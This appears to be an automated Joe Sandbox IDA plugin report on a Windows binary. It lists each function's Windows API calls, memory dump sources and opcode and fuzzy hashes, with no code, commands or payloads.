Part of subcall function 00E25B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00E87B20,?,?,00000000), ref: 00E25B8C
Part of subcall function 00E25B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00E87B20,?,?,00000000,?,?), ref: 00E25BB0

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
String ID:
API String ID: 327935632-0
Opcode ID: 2f606b5c6280d85a63e5f6000bbbac5abc1d492a399b3be10b0178a1e6dc1872
Instruction ID: 6015f792c3422a21cb81890df4cbb865979d683b3b16bc248419da517bf7deef
Opcode Fuzzy Hash: 2f606b5c6280d85a63e5f6000bbbac5abc1d492a399b3be10b0178a1e6dc1872
Instruction Fuzzy Hash: 28515875A04225DFCB00EFA8D8859ADF7F4FF59324B059069E819BB312DB30AD45CB91

Function 00E8E7DC Relevance: 7.6, APIs: 5, Instructions: 135COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00E8E88A
GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00E8E8B3
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00E8E8F2

Part of subcall function 00E29997: __itow.LIBCMT ref: 00E299C2
Part of subcall function 00E29997: __swprintf.LIBCMT ref: 00E29A0C

WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00E8E917
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00E8E91F

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
String ID:
API String ID: 1389676194-0
Opcode ID: 93c4e34feddca05733760cbafbe7847fcbeb2b016e35b187e5034da7f3777774
Instruction ID: 2dd82eeda26dd686247cc5e37852d21ffb157a3b7b884dc554e6b0517043177b
Opcode Fuzzy Hash: 93c4e34feddca05733760cbafbe7847fcbeb2b016e35b187e5034da7f3777774
Instruction Fuzzy Hash: FF513735A00215DFCB01EF64D981AAEBBF5FF48314B1494A9E849BB362CB31ED41CB50

Function 00EAA2C5 Relevance: 7.6, APIs: 5, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65d8e8b8bdbb5e6a550571f2b7c1fb338cfbe6743ce9b4d089b526053ec3563d
Instruction ID: a7f0fbd73e77a504b9d2af2c69313b90280edcd33e6ab4f18fb47d9977a38f1a
Opcode Fuzzy Hash: 65d8e8b8bdbb5e6a550571f2b7c1fb338cfbe6743ce9b4d089b526053ec3563d
Instruction Fuzzy Hash: 6241CD35900304AFDB20DB68CC48BB9BBA5EB0E310F181175F866BB2A1D770BD49CA91

Function 00E22344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00E22357
ScreenToClient.USER32(00EE67B0,?), ref: 00E22374
GetAsyncKeyState.USER32(00000001), ref: 00E22399
GetAsyncKeyState.USER32(00000002), ref: 00E223A7

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: e7d4b456a66f589eaf0b8e56907d7150d017e53ac17ff535b315d45b71ef12b2
Instruction ID: 082f1ef2df47fad34cacf65b475faee809153314ed859863cf41b8bb0f18e0f7
Opcode Fuzzy Hash: e7d4b456a66f589eaf0b8e56907d7150d017e53ac17ff535b315d45b71ef12b2
Instruction Fuzzy Hash: 96419F35504216FFCF158FA4DC44AE9BBB4FF4A324F205319F925B62A0C7346958DB91

Function 00E76920 Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E7695D
TranslateAcceleratorW.USER32(?,?,?), ref: 00E769A9
TranslateMessage.USER32(?), ref: 00E769D2
DispatchMessageW.USER32(?), ref: 00E769DC
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E769EB

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: Message$PeekTranslate$AcceleratorDispatch
String ID:
API String ID: 2108273632-0
Opcode ID: 667cad6a51477511b62719769225060f38094c1862faae412635cd7f162a2de3
Instruction ID: df3654d6f1b825677966b23005a0b4b0b986c015b6a3d37735378103c2e1b226
Opcode Fuzzy Hash: 667cad6a51477511b62719769225060f38094c1862faae412635cd7f162a2de3
Instruction Fuzzy Hash: 7F31E731900A86AFDB20CFB5DC84BF67BA8AB5634CF109169E529F6061E7349849DB90

Function 00E78F01 Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00E78F12
PostMessageW.USER32(?,00000201,00000001), ref: 00E78FBC
Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00E78FC4
PostMessageW.USER32(?,00000202,00000000), ref: 00E78FD2
Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00E78FDA

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: 04396f5f5b2ac06f68c93a9fde1fc8e7111536834cc48dcd33caed03f265e601
Instruction ID: ec0e06c106ccc6d1a58b55c0d1556851ffa5838be511ed4862db04c63111c215
Opcode Fuzzy Hash: 04396f5f5b2ac06f68c93a9fde1fc8e7111536834cc48dcd33caed03f265e601
Instruction Fuzzy Hash: BA31E07160021DEFDB18CFA8DA4CA9E7BB6EB55315F108229F928E61D0C7B09914CB91

Function 00E7B6AF Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00E7B6C7
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00E7B6E4
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00E7B71C
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00E7B742
_wcsstr.LIBCMT ref: 00E7B74C

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
String ID:
API String ID: 3902887630-0
Opcode ID: b7f6be0c278762b70a3ad158e717d7b7baa8865d9ba48e8e86b187db9484a2f1
Instruction ID: 59380cdcd9be17a5cd14cf80a7a03eae8cfb0543a6e26cd4a9c6d7c403be5670
Opcode Fuzzy Hash: b7f6be0c278762b70a3ad158e717d7b7baa8865d9ba48e8e86b187db9484a2f1
Instruction Fuzzy Hash: 6B212C31204204BFEB155B75AC49F7B7B9CDF89750F00917AFD09EA161EF61DC409290

Function 00EAB405 Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 00E22612: GetWindowLongW.USER32(?,000000EB), ref: 00E22623

GetWindowLongW.USER32(?,000000F0), ref: 00EAB44C
SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00EAB471
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00EAB489
GetSystemMetrics.USER32(00000004), ref: 00EAB4B2
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00E91184,00000000), ref: 00EAB4D0

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID:
API String ID: 2294984445-0
Opcode ID: 00928080923e974f2f1daf2beaba93462beba75474a0450f324f8e6fb59892a9
Instruction ID: 285b10236a2248e8b768988af025083d92f175e505accca9e038bdbf31e63a0c
Opcode Fuzzy Hash: 00928080923e974f2f1daf2beaba93462beba75474a0450f324f8e6fb59892a9
Instruction Fuzzy Hash: 14219431910265AFCB249F79CC44A693BA4FB0E725F145738F935EA1E2F730A810DB80

Function 00E797E9 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00E79802

Part of subcall function 00E27D2C: _memmove.LIBCMT ref: 00E27D66

SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00E79834
__itow.LIBCMT ref: 00E7984C
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00E79874
__itow.LIBCMT ref: 00E79885

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: MessageSend$__itow$_memmove
String ID:
API String ID: 2983881199-0
Opcode ID: d5f90a1026442d8862409c9241601b84b48f37f1d450b8a66fc7012d51e41c7f
Instruction ID: aa94ddce6e1397c93d3397f100bce07d4a8e9fc8854a94e2273a62bc2a2010fd
Opcode Fuzzy Hash: d5f90a1026442d8862409c9241601b84b48f37f1d450b8a66fc7012d51e41c7f
Instruction Fuzzy Hash: BD21C831700204ABEB149BB59C8AEEE7BE8DF4A714F086029FD08FB252D6709D4587D2

Function 00E212F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00E2134D
SelectObject.GDI32(?,00000000), ref: 00E2135C
BeginPath.GDI32(?), ref: 00E21373
SelectObject.GDI32(?,00000000), ref: 00E2139C

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 92c960a9d81d9b8aa06593683695f987a7768d5fc13c96e1a731f2597ca7d659
Instruction ID: 707cfe07cc4d5b68eff52ed42c534da7ccdb2de348457464ce2a644d0b496edb
Opcode Fuzzy Hash: 92c960a9d81d9b8aa06593683695f987a7768d5fc13c96e1a731f2597ca7d659
Instruction Fuzzy Hash: 2721907080025CEFDB14CF66FC857AD3BB9FB20365F155266F810BA1A0D371A999CB94

Function 00E7C161 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 00E7C176
_memcmp.LIBCMT ref: 00E7C194
_memcmp.LIBCMT ref: 00E7C1A7
_memcmp.LIBCMT ref: 00E7C1BF
_memcmp.LIBCMT ref: 00E7C1D7

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: df9e183a24a59c13436410d5aede676677bc6804c4a5e600ee96696fe96c8969
Instruction ID: 2d999e466a3dc517a253a3c9498582d700154e6c5b1b5dff4c86ee2fbf7f529b
Opcode Fuzzy Hash: df9e183a24a59c13436410d5aede676677bc6804c4a5e600ee96696fe96c8969
Instruction Fuzzy Hash: A401B9716052067BD604A5209C42FEB77EC9F113A8FA4A1BDFE08B7283F651DE1186E0

Function 00E84D35 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00E84D5C
__beginthreadex.LIBCMT ref: 00E84D7A
MessageBoxW.USER32(?,?,?,?), ref: 00E84D8F
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00E84DA5
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00E84DAC

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
String ID:
API String ID: 3824534824-0
Opcode ID: c634a48fca49b6c014000a88bb09f7f849df4eefdc25ef362634ff8735edb158
Instruction ID: ed900369ee31f8bd017e87ff03eb59c5824d512e2c8ad09e646b1674f0c6e4ba
Opcode Fuzzy Hash: c634a48fca49b6c014000a88bb09f7f849df4eefdc25ef362634ff8735edb158
Instruction Fuzzy Hash: D51108B2904249BFCB019BA99C44ADA7FACEB59324F144265F918F73E1D6719D0887A0

Function 00E7874A Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00E78766
GetLastError.KERNEL32(?,00E7822A,?,?,?), ref: 00E78770
GetProcessHeap.KERNEL32(00000008,?,?,00E7822A,?,?,?), ref: 00E7877F
HeapAlloc.KERNEL32(00000000,?,00E7822A,?,?,?), ref: 00E78786
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00E7879D

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: b0255a9090666d142f3e7228d087c790c6cffbe8c61af87ff00324e44d7fe00e
Instruction ID: 8f9ba3a370fb6c061de5b9d270ef8e919600c797e0bf54ecad5bac11b78730f0
Opcode Fuzzy Hash: b0255a9090666d142f3e7228d087c790c6cffbe8c61af87ff00324e44d7fe00e
Instruction Fuzzy Hash: B4016271641204FFDB244FABDD4CD677B6CFF9A3557204439F84AE2160DA319C04CAA0

Function 00E854E6 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00E85502
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00E85510
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00E85518
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00E85522
Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00E8555E

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 0602ba374a4a6990febebe977f20d837a06fa827013c2d464e4a44e9eb441ae9
Instruction ID: bb88350790b1665bff941fc8cbebb92e1dc733bb1eb440b8f5c2557d4bc6b398
Opcode Fuzzy Hash: 0602ba374a4a6990febebe977f20d837a06fa827013c2d464e4a44e9eb441ae9
Instruction Fuzzy Hash: 5B015B36C01A19DBCF00EFE9E848AEDBB79FB0D701F000056E849B2140DF305658CBA1

Function 00E77652 Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E7758C,80070057,?,?,?,00E7799D), ref: 00E7766F
ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E7758C,80070057,?,?), ref: 00E7768A
lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E7758C,80070057,?,?), ref: 00E77698
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E7758C,80070057,?), ref: 00E776A8
CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E7758C,80070057,?,?), ref: 00E776B4

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: b06834c7b609ce663f9a2946d05120b9ceab1aa8dfc3279c014be73d164b422e
Instruction ID: 7ef2b160bf0480304db550aca6c4b54cf0a7f32b7ec10573ee85494a1481c668
Opcode Fuzzy Hash: b06834c7b609ce663f9a2946d05120b9ceab1aa8dfc3279c014be73d164b422e
Instruction Fuzzy Hash: C201D4B6600604BFDB109F99DC04BAA7FACEB49751F204128FD48E2225EB35ED0487A0

Function 00E785F1 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00E78608
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00E78612
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00E78621
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00E78628
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00E7863E

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 9093998550a1dff213c1217dba6732c10672ec75678065454371f285697e4550
Instruction ID: b636c2db5fccde989a4a8e9bca45eb5353f062240ba932f9d3f05fe139ade6b8
Opcode Fuzzy Hash: 9093998550a1dff213c1217dba6732c10672ec75678065454371f285697e4550
Instruction Fuzzy Hash: 5EF06231241204BFEB100FE6DD8DE6B3BACEF9A759B005425F94DE6150CBB1ED4ADA60

Function 00E78652 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00E78669
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00E78673
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E78682
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00E78689
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E7869F

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
